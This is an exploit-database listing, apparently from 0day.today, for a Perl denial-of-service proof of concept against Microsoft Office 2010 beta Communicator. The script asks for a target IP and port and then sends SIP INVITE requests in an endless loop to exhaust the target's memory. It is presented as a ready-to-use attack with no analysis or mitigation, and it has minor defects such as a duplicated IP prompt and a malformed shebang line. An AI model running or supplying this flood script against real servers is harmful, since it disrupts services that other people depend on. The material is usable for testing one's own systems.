[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Office ( 2010 beta ) Communicator SIP DoS Exploit

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11645
Category
dos / poc
Date add
06-04-2010
Platform
windows
===========================================================
Microsoft Office ( 2010 beta ) Communicator SIP DoS Exploit
===========================================================

========================================================================================                 
| # Title    : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit      
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                        
| # Tested on: windows SP2       
| # Bug      : Denial of service Exploit                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  :
  
#!usr/bin/perl 
#######################################################################################################################
#    Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via    #
#    a large number of SIP INVITE requests.                                                                           #
#######################################################################################################################
   
   
use IO::Socket;
   
print("\nEnter IP Address of Target Server: \n");
$vuln_host_ip = <STDIN>;
print("\nEnter IP Address of Target Server: \n");
$port = <STDIN>;
   
$sock_sip = IO::Socket::INET->new(    PeerAddr => $vuln_host_ip,
                                     PeerPort => $port,
                                     Proto    => 'udp') || "Unable to create Socket";
#if the server is configured on TCP replace 'udp' with 'tcp'.
   
while(1)
{
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
    
}
   
#program never comes here for execution
 
close($sock_sip);





#  0day.today [2024-12-23]  #